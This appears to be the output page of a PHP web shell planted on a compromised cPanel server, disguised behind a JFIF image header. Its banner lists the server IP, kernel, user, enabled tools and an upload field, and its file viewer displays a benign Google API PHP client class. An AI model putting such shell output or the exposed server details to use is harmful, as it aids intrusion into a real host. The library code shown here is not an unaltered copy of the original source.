����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.14.132.123 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/google/apiclient-services/src/ServiceNetworking/Resource/ |
Upload File : |
<?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Service\ServiceNetworking\Resource; use Google\Service\ServiceNetworking\AddSubnetworkRequest; use Google\Service\ServiceNetworking\DisableVpcServiceControlsRequest; use Google\Service\ServiceNetworking\EnableVpcServiceControlsRequest; use Google\Service\ServiceNetworking\Operation; use Google\Service\ServiceNetworking\SearchRangeRequest; use Google\Service\ServiceNetworking\ValidateConsumerConfigRequest; use Google\Service\ServiceNetworking\ValidateConsumerConfigResponse; /** * The "services" collection of methods. * Typical usage is: * <code> * $servicenetworkingService = new Google\Service\ServiceNetworking(...); * $services = $servicenetworkingService->services; * </code> */ class Services extends \Google\Service\Resource { /** * For service producers, provisions a new subnet in a peered service's shared * VPC network in the requested region and with the requested size that's * expressed as a CIDR range (number of leading bits of ipV4 network mask). The * method checks against the assigned allocated ranges to find a non-conflicting * IP address range. The method will reuse a subnet if subsequent calls contain * the same subnet name, region, and prefix length. This method will make * producer's tenant project to be a shared VPC service project as needed. * (services.addSubnetwork) * * @param string $parent Required. A tenant project in the service producer * organization, in the following format: services/{service}/{collection-id * }/{resource-id}. {collection-id} is the cloud resource collection type that * represents the tenant project. Only `projects` are supported. {resource-id} * is the tenant project numeric id, such as `123456`. {service} the name of the * peering service, such as `service-peering.example.com`. This service must * already be enabled in the service consumer's project. * @param AddSubnetworkRequest $postBody * @param array $optParams Optional parameters. * @return Operation */ public function addSubnetwork($parent, AddSubnetworkRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('addSubnetwork', [$params], Operation::class); } /** * Disables VPC service controls for a connection. * (services.disableVpcServiceControls) * * @param string $parent The service that is managing peering connectivity for a * service producer's organization. For Google services that support this * functionality, this value is `services/servicenetworking.googleapis.com`. * @param DisableVpcServiceControlsRequest $postBody * @param array $optParams Optional parameters. * @return Operation */ public function disableVpcServiceControls($parent, DisableVpcServiceControlsRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('disableVpcServiceControls', [$params], Operation::class); } /** * Enables VPC service controls for a connection. * (services.enableVpcServiceControls) * * @param string $parent The service that is managing peering connectivity for a * service producer's organization. For Google services that support this * functionality, this value is `services/servicenetworking.googleapis.com`. * @param EnableVpcServiceControlsRequest $postBody * @param array $optParams Optional parameters. * @return Operation */ public function enableVpcServiceControls($parent, EnableVpcServiceControlsRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('enableVpcServiceControls', [$params], Operation::class); } /** * Service producers can use this method to find a currently unused range within * consumer allocated ranges. This returned range is not reserved, and not * guaranteed to remain unused. It will validate previously provided allocated * ranges, find non-conflicting sub-range of requested size (expressed in number * of leading bits of ipv4 network mask, as in CIDR range notation). * (services.searchRange) * * @param string $parent Required. This is in a form services/{service}. * {service} the name of the private access management service, for example * 'service-peering.example.com'. * @param SearchRangeRequest $postBody * @param array $optParams Optional parameters. * @return Operation */ public function searchRange($parent, SearchRangeRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('searchRange', [$params], Operation::class); } /** * Service producers use this method to validate if the consumer provided * network, project and requested range are valid. This allows them to use a * fail-fast mechanism for consumer requests, and not have to wait for * AddSubnetwork operation completion to determine if user request is invalid. * (services.validate) * * @param string $parent Required. This is in a form services/{service} where * {service} is the name of the private access management service. For example * 'service-peering.example.com'. * @param ValidateConsumerConfigRequest $postBody * @param array $optParams Optional parameters. * @return ValidateConsumerConfigResponse */ public function validate($parent, ValidateConsumerConfigRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('validate', [$params], ValidateConsumerConfigResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Services::class, 'Google_Service_ServiceNetworking_Resource_Services');